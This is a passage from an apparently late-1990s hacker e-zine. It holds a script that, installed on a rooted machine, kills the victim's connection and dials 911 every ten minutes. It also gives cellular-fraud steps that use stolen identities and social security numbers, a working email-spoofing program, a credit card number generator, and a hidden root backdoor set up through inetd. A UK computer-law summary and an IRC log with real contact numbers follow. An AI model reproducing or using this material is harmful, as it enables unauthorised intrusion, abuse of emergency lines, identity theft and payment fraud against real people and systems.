  870.  Secondary - 890mhz-5.50ghz, 7.0-9.5ghz, 10-39.6ghz
  871.  
  872.  Also, Wide Band Frequency Hopping centered on various UHF-TV channels
  873.  (ie: 510 or 670 mhz with a hopping width of +/- 25 mhz)
  874.  
  875.  Keep in mind that the federal government can use virtually any
  876.  frequency between DC and light. So get scanning now!!
  877.  
  878. ───────────────────────────────────────────────────────────────────────────────
  879.   2. 911 Autodialler Script : dk
  880. ───────────────────────────────────────────────────────────────────────────────
  881. Okay, scenario...
  882.  
  883. Your Friend g1mpfuck is on his linux system, you have never really liked him,
  884. and he has gone out to someplave for a few hours, to be back this evening...
  885.  
  886. If you root his system, and run this, his modem will dial 911 every 10 mins,
  887. but as soon as you do run it, it will kill the pppd and dial the number, so if
  888. he's on IRC, then he will quit... Here it is! Read the instructions in the
  889. code first...
  890.  
  891.  
  892. #!/bin/sh
  893. # 911-autodial.sh
  894. # for use with linux boxes running DIP.
  895. # dials 911 every ten minutes, and if the user is using pppd
  896. # it kills pppd in order to place the call.
  897.  
  898. # IMPORTANT!!!
  899. # add this line to root's crontab with: crontab -e root
  900. # 2,12,22,32,42,52 * * * * /path/to/911-autodial.sh
  901.  
  902. # note: this assumes the modem device is: /dev/modem
  903. # if it is otherwise change "port modem" to
  904. # "port cua1" or whatever the modem device is 
  905. # although it is usally /dev/modem.
  906.  
  907. echo "   get $local 0.0.0.0" >> /tmp/911.dip
  908. echo "   get $remote 0.0.0.0" >> /tmp/911.dip
  909. echo "   port modem" >> /tmp/911.dip
  910. echo "   speed 38400" >> /tmp/911.dip
  911. echo "   reset" >> /tmp/911.dip
  912.  
  913. echo "   send ATQ0V1E1X4\r" >> /tmp/911.dip
  914. echo "   wait OK 2" >> /tmp/911.dip
  915. echo "   dial 911" >> /tmp/911.dip
  916.  
  917. ps -aux|grep pppd|grep -v grep >> /tmp/ppp-check
  918.  
  919. grep "^root" /tmp/ppp-check > /dev/null 2>&1
  920. if [ $? -ne 0 ] ; then
  921.         echo "PPP IS DEAD" > /tmp/ppp-dead 
  922. fi
  923.  
  924. if [ -f /tmp/ppp-dead ]; then
  925.      /sbin/dip /tmp/911
  926.      rm /tmp/ppp-*
  927.      rm /tmp/911.dip
  928.      exit 1
  929. fi
  930.  
  931. kill `ps -ax|grep pppd|grep -v grep|awk 'BEGIN {FS="  ";OFS=" "} {print $1}`
  932. /sbin/dip /tmp/911
  933. rm /tmp/ppp-*
  934. rm /tmp/911.dip
  935. exit 1
  936.  
  937. ───────────────────────────────────────────────────────────────────────────────
  938.   3. Cellular Calls Without Cloning : TRON
  939. ───────────────────────────────────────────────────────────────────────────────
  940.  
  941. There are several ways to make free calls with a cellular phone that does not
  942. have service with the hassle of cloning it, or if you have a phone that can't
  943. be cloned or you don't want to buy the expensive equipment required, so here
  944. are a few ways to do it from home with little risk...
  945.  
  946. 1.) American Roaming Network.
  947. -----------------------------
  948.  
  949. To reach the American Roaming Network (or something like it, depending on
  950. where you are), put your phone on the alternate carrier side so it says roam,
  951. then dial 0 and it should tell you your call is being forwarded.
  952.  
  953. At that point you should be connected to an automated system, form here you
  954. have a couple of billing options...
  955.  
  956. To use a credit or calling card, you enter the area code and number you want
  957. to call; for a calling card you then enter the card number and pin, for a 
  958. credit card you then enter the card number and expirarion date, then the zip
  959. code of the billing address. ARN takes MasterCard, American Express, and
  960. most local and long distance company calling cards. They say they dont take
  961. VISA anymore, but I've gotten them to work on the automated system.
  962.  
  963. If the number you call is busy or doesn't answer, you can press * and then
  964. either leave a message that the system will deliver, or try another number.
  965. If you want to dial another number you will have to put the zip code again
  966. after the new number.
  967.  
  968. You can also make collect and 3rd party billed calls by dialing 0 instead of
  969. the number to call when you connect to ARN. You will be sent to an operator,
  970. tell them you would like to place a call. They will then ask how you would
  971. like to bill it. You can set up a local dialup voice mail box and change
  972. the greeting so it sounds like someone's there to accept the charges, the
  973. operator has to read a script, so you have to adjust the timing to get it
  974. just right.
  975.  
  976. ARN will not 3rd party or collect bill to 800 numbers, nor will they place
  977. calls to 800 numbers charged to 3rd party numbers.
  978.  
  979. 2.) Social Engineering.
  980. -----------------------
  981.  
  982. Another way is to dial 611 and tell the customer support person that you're
  983. having trouble getting through to the area you're trying yo call and could
  984. they try place the call for you. This works about 50% of the time, it helps
  985. to have the name and cell number of someone who has service with that
  986. provider in case they ask for it, they might ask for the social security
  987. number too, so be prepared, dumpster diving at a cell store is the easiest
  988. place to get that info.
  989.  
  990. 3.) Set Up Service With Someone Else's Info.
  991. --------------------------------------------
  992.  
  993. The best way, and the one I prefer to cloning, is to get someone else's
  994. information and set up service. The best place to get the information you'll
  995. need is from a place that does credit checks, like a bank or car dealership.
  996. Make sure they have a good rating, like A, B or C, then you wont be asked
  997. for a deposit.
  998.  
  999. You'll need a name, address, social security number, drivers license number
  1000. and work number.
  1001.  
  1002. You will also need a cell phone that is not stolen. They will not activate a
  1003. stolen phone, when I tried they put me on hold and called the person who's
  1004. phone I had and then told me the person wanted me to mail the phone back to
  1005. them.
  1006.  
  1007. Also find and write down the electronic serial number, you'll need that too.
  1008. You then need to call a local cell service provider (ie. GTE MobilNet,
  1009. Cellular One, Bell South Mobility, etc.) on a phone you have. Let them tell 
  1010. you about the different service plans and pick one.
  1011.  
  1012. They will then ask for your "information" and ESN. Then they will ask to
  1013. call you back with your new cell number, tell them that you're out and
  1014. ask for a number to call them back at, they will have no problem with this.
  1015.  
  1016. Then call them back and they will tell you how to program your new number
  1017. into your phone, they might also tell you how to program in a new system ID
  1018. and pagin channel etc, this is no big deal.
  1019.  
  1020. Also ask when the billing cycle ends and when the bill is sent out, you will
  1021. want to stop using this number when the person you're billing it to gets
  1022. their bill.
  1023.  
  1024. Be sure to get call features like 3-way and call forwarding, they're always
  1025. useful to have.
  1026.  
  1027. I prefer this to cloning because its less worry and hassle and it lasts up
  1028. to a month.
  1029.  
  1030. ───────────────────────────────────────────────────────────────────────────────
  1031. ===============================================================================
  1032. ==[ MISC ]=====================[ .SECTION D. ]=======================[ MISC ]==
  1033. ===============================================================================
  1034. ───────────────────────────────────────────────────────────────────────────────
  1035.  1. Getting Your Exploits Onto Systems : so1o
  1036. ───────────────────────────────────────────────────────────────────────────────
  1037.  
  1038. You want to get files or exploits onto another system, you can do this the
  1039. following few ways...
  1040.  
  1041. 1) Mail The User The File.
  1042. --------------------------
  1043.  
  1044. This method is simple, easy to do, pretty undetectable, but sometimes may be
  1045. a touch too slow, depending on the location / speed of the system...just mail
  1046. login@host.com the file or whatever, then wait at the other side for them to
  1047. get it.
  1048.  
  1049. 2) FTP to the system.
  1050. ----------------------
  1051.  
  1052. Using an FTP client, you can FTP to the remote server from your system, then
  1053. upload the files to the server, but you will most probably get logged, and so
  1054. if your exploits fail, this may not be such a good idea...
  1055.  
  1056. 3) Use cat to input the file from the terminal.
  1057. -----------------------------------------------
  1058.  
  1059. This is easy to do, pretty quick and effective, follow these steps...
  1060.  
  1061. FearFactory:~:$ cat > heh.c << STOP
  1062. #include <stdio.h>
  1063.  
  1064. main()
  1065. {
  1066. printf("Quit Laughin' At Yerself Yew Gimp :P\n"):
  1067. }
  1068. STOP
  1069. FearFactory:~:$ cat heh.c
  1070. #include <stdio.h>
  1071.  
  1072. main()
  1073. {
  1074. printf("Quit Laughin' At Yerself Yew Gimp :P\n"):
  1075. }
  1076. FearFactory:~:$ cc -o heh heh.c
  1077. FearFactory:~:$ heh
  1078. Quit Laughin' At Yerself Yew Gimp :P
  1079. FearFactory:~:$
  1080.  
  1081. I used "cat > filename.c << STOP" to input the file from the terminal, I could
  1082. have cut a file from another editor, then just pasted it to the terminal, then
  1083. when I type "STOP" and hit enter, cat stops taking input from the terminal and
  1084. EOF's the file...Then I cat it again, to prove that the STOP does not stay as
  1085. part of the file, then I proceed to compile the source using cc and then I run
  1086. the program, easy =)
  1087.  
  1088. Always remember to remove traces of exploits from the system if you fail, as
  1089. this is messy and could lead to the admin becoming suspicious, just keep your
  1090. technique clean, and you will learn some good skills...
  1091.  
  1092. Recommended Reading :
  1093. ---------------------
  1094.  
  1095.   LINUX IN A NUTSHELL - A Desktop Quick Reference
  1096.   By Jessica Perry Hekman
  1097.   Copyright 1997 O'Reilly & Associates
  1098.  
  1099.   ISBN 1-56592-167-4
  1100.  
  1101.     UK  : £14.99
  1102.     US  : $19.95
  1103.     CAN : $28.95
  1104.  
  1105. I really like this book, its very easy to use, pretty compact, and 424 pages
  1106. long, the information in it will boost your skills by a long way if you are
  1107. a newbie, and there are alot of more advanced features, such as debugfs and
  1108. many other programs and their syntax. Basically its a dictionary of Linux
  1109. commands, along with a short explanation, the syntax for the command and
  1110. many examples, I have the first printing, which is January 1997, so this book
  1111. is not old at all, and pretty up-to-date...
  1112.  
  1113. ───────────────────────────────────────────────────────────────────────────────
  1114.   2. Fakemailing Techniques : so1o
  1115. ───────────────────────────────────────────────────────────────────────────────
  1116.  
  1117. Fakemailing is old and very very easy to do. To use this simple fakemailing
  1118. program just make a file, such as letter.txt with the stuff you want to send
  1119. in it, like "Hey Bill! how's it going?" or whatever. Next compile the
  1120. fakemail.c using gcc -o sendfake sendfake.c ignore any warning messages.
  1121. Run the program using "sendfake" and follow the steps, simple as that =)
  1122.  
  1123. /**********************************************************/
  1124. /*                     SENDFAKE.C                         */
  1125. /*                                                        */
  1126. /*                                                        */
  1127. /*         Author: asm@quantum.syspac.com                 */
  1128. /*                                                        */
  1129. /*         To compile: gcc -o sendfake sendfake.c         */
  1130. /*         Usage     : sendfake                           */
  1131. /*                                                        */
  1132. /**********************************************************/
  1133.  
  1134. #include <stdio.h>
  1135. #include <string.h>
  1136. #include <errno.h>
  1137. #include <signal.h>
  1138. #include <sys/types.h>
  1139. #include <sys/socket.h>
  1140. #include <netinet/in.h>
  1141. #include <netdb.h>
  1142.  
  1143. #define MAXLEN 256
  1144.  
  1145. int s;
  1146.  
  1147. int call_socket(char *hostname)
  1148. {
  1149.   struct sockaddr_in sa;
  1150.   struct hostent     *hp;
  1151.   int    a, s;
  1152.  
  1153.   if ((hp=gethostbyname(hostname))==NULL) return(-1);
  1154.   bzero(&sa, sizeof(sa));
  1155.   bcopy(hp->h_addr, (char *)&sa.sin_addr, hp->h_length);
  1156.   sa.sin_family = hp->h_addrtype;
  1157.   sa.sin_port = htons((u_short)25);
  1158.  
  1159.   if((s=socket(hp->h_addrtype, SOCK_STREAM, 0)) < 0)
  1160.     return(-1);
  1161.   if(connect(s, &sa, sizeof(sa)) < 0) {
  1162.     close(s);
  1163.     return(-1);
  1164.   }
  1165.   return(s);
  1166. }
  1167.  
  1168. int readln(char *buf)
  1169. {
  1170.   int to=0;
  1171.   char c;
  1172.  
  1173.   do {
  1174.     if(read(s, &c, 1)<1)
  1175.       return(0);
  1176.     if((c >= ' ') || (c <= 126))
  1177.       if(to<MAXLEN-1)
  1178.         buf[to++] = c;
  1179.   } while (c != '\n');
  1180.  
  1181.   buf[to] = '\0';
  1182.   return(1);
  1183. }
  1184.  
  1185. void writeln(char *buf)
  1186. {
  1187.   write(s, buf, strlen(buf));
  1188.   write(s, "\n",1);
  1189. }
  1190.  
  1191. void input(char *msg,char *pt)
  1192. {
  1193.    printf("%s: ",msg);
  1194.    gets(pt);
  1195. }
  1196.  
  1197. int main(void)
  1198. {
  1199.   char hostn[20];
  1200.   char from[40];
  1201.   char to[40];
  1202.   char name[40];
  1203.   char subject[60];
  1204.   char passw[20];
  1205.   char str[MAXLEN];
  1206.   char buf[MAXLEN];
  1207.   FILE *fp;
  1208.  
  1209.   printf("\n");
  1210.   printf("Welcome to sendfake!  The BEST fake/anon mailer there is!\n");
  1211.   printf("By asm@quantum.syspac.com\n");
  1212.   printf("\n"); 
  1213.   input("Host to fake mail from",hostn);
  1214.   if((s=call_socket(hostn)) <0) {
  1215.     perror("Connection error");
  1216.     exit(1);
  1217.   }
  1218.   readln(buf);
  1219.   gethostname(hostn,20);
  1220.   sprintf(str, "HELO %s", hostn);
  1221.   writeln(str);
  1222.   readln(buf);
  1223.   input("Fake email address fakemail is FROM",from);
  1224.   sprintf(str, "MAIL FROM: <%s>",from);
  1225.   writeln(str);
  1226.   readln(buf);
  1227.   do {
  1228.     input("Send fake mail TO",to);
  1229.     sprintf(str, "RCPT TO: <%s>",to);
  1230.     writeln(str);
  1231.     readln(buf);
  1232.     *(buf+3) = 0;
  1233.     if(atoi(buf) == 250) break; else printf("%s",buf+4);
  1234.   } while(1);
  1235.   input("Name of lamer getting the fake mail",name);
  1236.   input("Subject of fake mail",subject);
  1237.   writeln("DATA");
  1238.   sprintf(str,"To: %s <%s>",name,to);
  1239.   writeln(str);
  1240.   if(strlen(subject)) {
  1241.     sprintf(str, "Subject: %s", subject);
  1242.     writeln(str);
  1243.   }
  1244.   do {
  1245.     input("File to read and include in fake mail",str);
  1246.     if(!strlen(str)) {
  1247.       close(s);
  1248.       exit(1);
  1249.     }
  1250.     if((fp = fopen(str,"rt")) == NULL) printf("Could not find file %s\n", 
  1251. str);
  1252.     else break;
  1253.   } while(1);
  1254.   while(fgets(str,MAXLEN,fp)) write(s, str, strlen(str));
  1255.   writeln("\n.\n");
  1256.   readln(buf);
  1257.   writeln("QUIT\n");
  1258.   printf("Sent!!!\n");
  1259.   close(s);
  1260. }
  1261.  
  1262. ───────────────────────────────────────────────────────────────────────────────
  1263.   3. Pascal Credit Card Generator Source : Lobster Guacamole
  1264. ───────────────────────────────────────────────────────────────────────────────
  1265.  
  1266.  PROGRAM ccnum;
  1267.  
  1268.  { Written by Lobster Guacamole.                                              }
  1269.  {                                                                            }
  1270.  { I wrote this program because I enjoy fucking over every goddam bureacratic }
  1271.  { and/or facist aspect of our society.  This program simply spits out ten    }
  1272.  { random credit card numbers based on the bank prefix used.  See lines 58    }
  1273.  { through 61 for information on the bank prefix used.  There is also a lame  }
  1274.  { password feature for minor security.  See lines 42 through 50 for          }
  1275.  { information on the password feature.                                       }
  1276.  {                                                                            }
  1277.  { Remember, however, the numbers that are spit out may not work because      }
  1278.  { the credit card company may not have assigned that number to a customer    }
  1279.  { yet.  Have fun!                                                            }
  1280.  {                                                                            }
  1281.  { You can use a simple program like pas2c to translate this code into c      }
  1282.  {                                                              - Tetsu Khan  }
  1283.  
  1284.  USES
  1285.   Crt;
  1286.  
  1287.  VAR
  1288.   ccnum_count : Integer;
  1289.  
  1290.  
  1291.  PROCEDURE program_init;
  1292.   BEGIN
  1293.    Randomize;
  1294.    CheckBreak := False;
  1295.   END;
  1296.  
  1297.  PROCEDURE show_title;
  1298.   BEGIN
  1299.    ClrScr;
  1300.    Writeln;
  1301.    Writeln( 'CCNUM - Credit Card Number Generator.' );
  1302.    Writeln( 'Written by Lobster Guacamole.' );
  1303.    Writeln;
  1304.   END;
  1305.  
  1306.  
  1307.  PROCEDURE get_pwd;
  1308.   VAR
  1309.    program_pwd : String;
  1310.  
  1311.   BEGIN
  1312.    Writeln;
  1313.    Write( 'Enter password>' );      
  1314.    Readln( program_pwd );           
  1315.  
  1316.      IF program_pwd = 'a' THEN    { The current password is a lower case  }
  1317.       BEGIN                       { letter 'a'.  Recompile the program if }
  1318.        Writeln;                   { you change the password, of course.   }
  1319.        Writeln( 'Correct' );      { Change password on line 47 as well.   }
  1320.        Writeln;
  1321.       END;
  1322.  
  1323.      IF program_pwd <> 'a' THEN  { If you changed the password on line 40, }
  1324.       BEGIN                      { change it here, too.                    }
  1325.        Writeln;
  1326.        Writeln( 'Incorrect' );
  1327.        Halt;
  1328.       END;
  1329.   END;
  1330.  
  1331.  
  1332.  
  1333.  PROCEDURE make_ccnum;
  1334.   VAR
  1335.    ccnum_digits       : ARRAY[ 1..16 ] OF Integer;
  1336.    doub_odd_digits    : ARRAY[ 1..8 ] OF Integer;
  1337.    digit_count        : Integer;
  1338.    yn_choice          : Char;
  1339.    added_digits       : Integer;
  1340.  
  1341.   BEGIN
  1342.  
  1343.     ccnum_digits[1] := 5;   { This part may have to be changed depending }
  1344.     ccnum_digits[2] := 4;   { on the bank prefix used.  The bank prefix  }
  1345.     ccnum_digits[3] := 2;   { here is '5424', the prefix for Citibank.   }
  1346.     ccnum_digits[4] := 4;   { Recompile the program if you change it.    }
  1347.  
  1348.     REPEAT
  1349.  
  1350.        FOR digit_count := 5 TO 16 DO
  1351.          BEGIN
  1352.           ccnum_digits[ digit_count ] := Random(10);
  1353.          END;
  1354.  
  1355.          doub_odd_digits[1]  := 2 * ccnum_digits[1];
  1356.            IF doub_odd_digits[1] > 9 THEN
  1357.            doub_odd_digits[1] := doub_odd_digits[1] - 9;
  1358.  
  1359.          doub_odd_digits[2]  := 2 * ccnum_digits[3];
  1360.            IF doub_odd_digits[2] > 9 THEN
  1361.            doub_odd_digits[2] := doub_odd_digits[2] - 9;
  1362.  
  1363.          doub_odd_digits[3]  := 2 * ccnum_digits[5];
  1364.            IF doub_odd_digits[3] > 9 THEN
  1365.            doub_odd_digits[3] := doub_odd_digits[3] - 9;
  1366.  
  1367.          doub_odd_digits[4]  := 2 * ccnum_digits[7];
  1368.            IF doub_odd_digits[4] > 9 THEN
  1369.            doub_odd_digits[4] := doub_odd_digits[4] - 9;
  1370.  
  1371.          doub_odd_digits[5]  := 2 * ccnum_digits[9];
  1372.            IF doub_odd_digits[5] > 9 THEN
  1373.            doub_odd_digits[5] := doub_odd_digits[5] - 9;
  1374.  
  1375.          doub_odd_digits[6] := 2 * ccnum_digits[11];
  1376.            IF doub_odd_digits[6] > 9 THEN
  1377.            doub_odd_digits[6] := doub_odd_digits[6] - 9;
  1378.  
  1379.          doub_odd_digits[7] := 2 * ccnum_digits[13];
  1380.            IF doub_odd_digits[7] > 9 THEN
  1381.            doub_odd_digits[7] := doub_odd_digits[7] - 9;
  1382.  
  1383.          doub_odd_digits[8] := 2 * ccnum_digits[15];
  1384.            IF doub_odd_digits[8] > 9 THEN
  1385.            doub_odd_digits[8] := doub_odd_digits[8] - 9;
  1386.  
  1387.           added_digits := doub_odd_digits[1] + doub_odd_digits[2] +
  1388.                           doub_odd_digits[3] + doub_odd_digits[4] +
  1389.                           doub_odd_digits[5] + doub_odd_digits[6] +
  1390.                           doub_odd_digits[7] + doub_odd_digits[8] +
  1391.                           ccnum_digits[2]    + ccnum_digits[4] +
  1392.                           ccnum_digits[6]    + ccnum_digits[8] +
  1393.                           ccnum_digits[10]   + ccnum_digits[12] +
  1394.                           ccnum_digits[14]   + ccnum_digits[16];
  1395.  
  1396.     UNTIL added_digits MOD 10 = 0;
  1397.  
  1398.  
  1399.     Writeln( ' ', ccnum_digits[1],
  1400.                   ccnum_digits[2],
  1401.                   ccnum_digits[3],
  1402.                   ccnum_digits[4],
  1403.                   ' ',
  1404.                   ccnum_digits[5],
  1405.                   ccnum_digits[6],
  1406.                   ccnum_digits[7],
  1407.                   ccnum_digits[8],
  1408.                   ' ',
  1409.                   ccnum_digits[9],
  1410.                   ccnum_digits[10],
  1411.                   ccnum_digits[11],
  1412.                   ccnum_digits[12],
  1413.                   ' ',
  1414.                   ccnum_digits[13],
  1415.                   ccnum_digits[14],
  1416.                   ccnum_digits[15],
  1417.                   ccnum_digits[16] );
  1418.   END;
  1419.  
  1420.  
  1421.  
  1422.  BEGIN
  1423.   program_init;
  1424.   show_title;
  1425.   get_pwd;
  1426.   FOR ccnum_count := 1 TO 10 DO make_ccnum;
  1427.  END.
  1428.  
  1429. ───────────────────────────────────────────────────────────────────────────────
  1430.   4. in.courierd : backdoor on port 530 : so1o
  1431. ───────────────────────────────────────────────────────────────────────────────
  1432.  
  1433. As root do the following (without the %'s ;]) to setup the backdoor.
  1434. --------------------------------------------------------------------
  1435.  
  1436.  [This Method Has Been Tested On A Linux 2.0.30]
  1437.  
  1438. % cp /bin/bash /usr/sbin/in.courierd
  1439.  
  1440. % chmod 4755 /usr/sbin/in.courierd           [optional, depends on system]
  1441.  
  1442. % echo "courier    stream  tcp   nowait   root   /usr/sbin/in.courierd" >> /etc/inetd.conf
  1443.  
  1444. % /sbin/pidof inetd.conf                     [to find the pid of inetd.conf]
  1445.  
  1446. % kill -HUP <pid>                            [replace the <pid> with the real pid]
  1447.  
  1448. % telnet localhost 530                       [test backdoor]
  1449.  
  1450.  All commands to the backdoor must end with ;, for example....
  1451.  
  1452.   exit;
  1453.   ps -a;
  1454.   whoami;
  1455.   cd /;
  1456.  
  1457.  You are root when you use the backdoor, and you are not seen or logged. The
  1458.  last time I used this, it stayed up for 2 weeks =)
  1459.  
  1460.  The above commands I have tested in Linux, I have heard that you have to reboot
  1461.  a Sun for the new settings to take effect (shutdown -r now).
  1462.  But hey! its only a prototype at the moment until I make it cool and alot
  1463.  better =)
  1464.  
  1465.  Have fun.
  1466.  
  1467.  so1o
  1468.  
  1469. ───────────────────────────────────────────────────────────────────────────────
  1470.   5. UK Laws On Computer Misuse : Darkfool
  1471. ───────────────────────────────────────────────────────────────────────────────
  1472.  
  1473. This part is actually useful info, not like Darkfools lesser works...Partially
  1474. edited by me, the original can be now found at www.sinnerz.com/bible.htm -  T_K
  1475.  
  1476. Hey, this is an interesting little read. Please note it still can be quite
  1477. interesting even if you don't like in UK - Darkfool.
  1478.  
  1479. The 1990 Computer Misuse Act - UK
  1480. ---------------------------------
  1481.  
  1482. In plain English.
  1483. -----------------
  1484.  
  1485.  "An Act to make provision for securing computer material against
  1486.  unauthorised access or modification; and for connected purposes"
  1487.  
  1488. { This is the long title (header) of the Act and confirms what the act does
  1489.   and applies to. }
  1490.  
  1491.  
  1492. SECTION 1 Unauthorised access to computer material
  1493. --------------------------------------------------
  1494.  
  1495. TEXT:
  1496.  
  1497. A person is guilty of an offence if he causes a computer to perform any
  1498. function with intent to secure access to any program or data held in any
  1499. computer.
  1500.  
  1501. { This means that if you can get access to files which you shouldn't be
  1502.   allowed to retrieve or read then you are committing a offence, this only
  1503.   applies if the person in question has intent ( meaning they are doing it
  1504.   on purpose, often referred to as hacking ) to carry this out. }
  1505.  
  1506. A person is guilty of an Offence if the access he intends to secure is
  1507. unauthorised; and he knows at the time when he causes the computer to
  1508. perform the function that that is the case.
  1509.  
  1510. { This means that the person is guilty doesn't have authorisation to
  1511.   secure access to files then he is committing an offence. The person is
  1512.   not guilty if he/she doesn't know what they are trying to perform.
  1513.   This applies to everything i.e. any program, a program or data of any
  1514.   particular kind and a program or data held }
  1515.  
  1516. A person guilty of an offence under this section shall be
  1517. liable on summary conviction to imprisonment for a term not exceeding
  1518. six months or to a fine not exceeding level 5 on the standard scale or
  1519. to both. 
  1520.  
  1521. { Meaning, you could go to prison for 6 months for committing
  1522.   an offence mentioned above ! You could also be subject to a fine 
  1523.   @ level 5, which is always changing. You have to be convicted of the
  1524.   crime first though ;) }
  1525.  
  1526.  
  1527. SECTION 2 Unauthorised access with intent to commit or facilitate
  1528. -----------------------------------------------------------------
  1529. commission of further offences
  1530. ------------------------------
  1531.  
  1532. A person is guilty of an offence under this section if he commits an
  1533. offence under section 1 above. To commit an offence to which this
  1534. section applies or to facilitate the commission of such an offence
  1535. ( whether by himself or by any other person) and the offence he intends
  1536. to commit or facilitate is referred to below in this section as the
  1537. further offence.
  1538.  
  1539. { This meaning that what is mentioned in section 2
  1540.   applies to the person gaining unauthorised access to a computer system
  1541.   and to anyone who facilitates such a person }
  1542.  
  1543. This section applies to offences for which a person of twenty-one years
  1544. of age or over ( not previously convicted ) may be sentenced to
  1545. imprisonment for a term of five years.
  1546.  
  1547. { This means that if you re-offend or facilitate to re-offend and have
  1548.   been convicted you are liable to 5 years imprisonment or/and a large
  1549.   fine }
  1550.  
  1551.  
  1552. SECTION 3 Unauthorised modification of computer material
  1553. --------------------------------------------------------
  1554.  
  1555. A person is guilty of an offence if he/she does any act that causes an
  1556. unauthorised modification of the contents of any computer; and at the
  1557. time when he does the act he has the requisite intent and the requisite
  1558. knowledge.
  1559.  
  1560. { This means that if a person modifies computer material
  1561.   which he/she is not authorised to do he/she is guilty of committing
  1562.   an offence, however, the person must have the intent to carry out this
  1563.   crime else the person is not liable }
  1564.  
  1565. { This next bit is the interesting bit }
  1566.  
  1567. For the purposes of the above section the requisite knowledge is an intent
  1568. to cause a modification of the contents of any computer and by so doing
  1569. to impair the operation of any computer; to prevent or hinder access to
  1570. any program or data held in any computer; to impair the operation of any
  1571. such program or the reliability of any such data. The intent need not be
  1572. directed at any particular computer; any particular program or data or a
  1573. program or data of any particular kind; or any particular modification.
  1574.  
  1575. { This basically means, if you have the intent and knowledge of breaking
  1576.   into computers, without have to actually do it you can be liable to an
  1577.   offence. }
  1578.  
  1579. For the purposes of the Criminal Damage Act 1971 a modification of the
  1580. contents of a computer shall not be regarded as damaging any computer or
  1581. computer storage medium unless its effect on that computer storage medium,
  1582. impairs its physical condition.
  1583.  
  1584. { Meaning that you cannot be prosecuted for criminal damage whilst hacking
  1585.   into a machine unless you cause physical damage i.e. on site hacking,
  1586.   then taking a sledge hammer to the computer can be classed as criminal
  1587.   damage but change the password for root login is not criminal damage,
  1588.   unless you send the computer into high speed self destruct mode and
  1589.   ruin one of the heads on the 50 gig duke box ? }
  1590.  
  1591. { A lot of the next part of the document is about jurisdiction and some
  1592.   technical mumbo jumbo }
  1593.  
  1594.  
  1595. SECTION 14 Search warrants for offences under section 1
  1596. -------------------------------------------------------
  1597.  
  1598. Where a circuit judge is satisfied by information on oath given by a
  1599. constable that there are reasonable grounds for believing that an offence
  1600. under section 1 above has been or is about to be committed in any
  1601. premises; and that evidence that such an offence has been or is about to
  1602. be committed is in those premises he/she may issue a warrant authorising a
  1603. constable to enter and search the premises, using such reasonable force
  1604. as is necessary.
  1605.  
  1606. { This basically means that if they believe that you have the intent or
  1607.   have broken into a system your not supposed to ( section 1 ) they can
  1608.   come around your house and knock your door in, or, open it for them
  1609.   nicely. }
  1610.  
  1611.  
  1612. SECTION 15 Extradition where Schedule 1 to the Extradition Act 1989 applies
  1613. ---------------------------------------------------------------------------
  1614.  
  1615. The offences to which an order in council under section 2 of the extradition
  1616. act 1870 can apply shall include offences under sections 2 and 3 and any
  1617. conspiracy to commit such an offence and any attempt to commit an offence
  1618. under section 3.
  1619.  
  1620. { This meaning, that if you have a conspiracy to break into a system you
  1621.   can be extradited }
  1622.  
  1623. In the UK it can be illegal to posses anything which may show an intent to
  1624. hack, such as hacking documents.
  1625.  
  1626. So, if your out there and in UK and didn't know that you were doing is most
  1627. probably illegal then keep your head down !
  1628.  
  1629. ───────────────────────────────────────────────────────────────────────────────
  1630.   6. so1o Gets Busted By CERT : so1o
  1631. ───────────────────────────────────────────────────────────────────────────────
  1632.  
  1633. I've been busted by CERT?!@# umm, okay...whatever you say Hostile you fucken
  1634. pussy! and a cl000less one at that!@# Speadin' shit about stuff you dont know :
  1635.  
  1636. [20:57] <FuckingHostile> dude!!
  1637. <byteboy> wassup?
  1638. [20:59] <FuckingHostile> so1o got busted by CERT!
  1639. <byteboy> lol
  1640. [21:00] <FuckingHostile> yup
  1641. [21:00] <FuckingHostile> they have logs of him on over 80 computers
  1642. [21:01] <FuckingHostile> thats all i know is like what i just got
  1643. forwarded to me
  1644. [21:03] <FuckingHostile> they got logs from when he used phfscan.c
  1645. [21:03] <FuckingHostile> and other shit
  1646. any more info on so1o shit ?
  1647. [21:06] <FuckingHostile> l
  1648. [21:06] <FuckingHostile> Dear Sir.
  1649. [21:06] <FuckingHostile> We have now traced down the responsible account
  1650. behind this attempt and=20
  1651. [21:06] <FuckingHostile> have taken action against it.
  1652. [21:06] <FuckingHostile> If you would like to know who is behond this you
  1653. should either file a=20
  1654. [21:06] <FuckingHostile> report to the propper authoroties or fax pege
  1655. Gustagsson at  +++ 46 8=20
  1656. [21:06] <FuckingHostile> 7132657 and ask him to trace this down in the
  1657. phone network.
  1658. [21:06] <FuckingHostile> If you got any more question feel free to get
  1659. back to me.. or if you=20
  1660. [21:06] <FuckingHostile> think that this is to be considered as closed.
  1661. [21:06] <FuckingHostile> check this now
  1662. [21:06] <FuckingHostile>      __ ____ Telia Internet=20
  1663. [21:06] <FuckingHostile>   / /_/  /   Incident Response Team
  1664. [21:06] <FuckingHostile>  / / \  /    IRT@TELIA.NET
  1665. [21:06] <FuckingHostile> =09     FAX ++46 - 8 456 8935=20
  1666. [21:06] <FuckingHostile> On Fri, 2 May 1997, m0dify wrote:
  1667. [21:06] <FuckingHostile> > That is the log from our www.usda.gov web
  1668. server.... CERT also said that
  1669. [21:06] <FuckingHostile> > this log is on 80 computers since 4/1/97   .
  1670. There was also a log on
  1671. [21:06] <FuckingHostile> > the 17th of April. =20
  1672. [21:07] <FuckingHostile> > > Dear Sir.
  1673. [21:08] <FuckingHostile> > > This messages dropped down on my desk today.
  1674. [21:08] <FuckingHostile> > > I need a time to know who was on that dial up
  1675. and so whe could hunt
  1676. [21:08] <FuckingHostile> > > him/her down in the phone network..
  1677. [21:08] <FuckingHostile> heh... so1o fuct up it seems..
  1678. <byteboy> he's toast.
  1679. [21:10] <FuckingHostile> im glad to man... amnesty was just so uncool when
  1680. he did that
  1681.  
  1682. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1683. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1684. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
  1685. h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0h0!@#
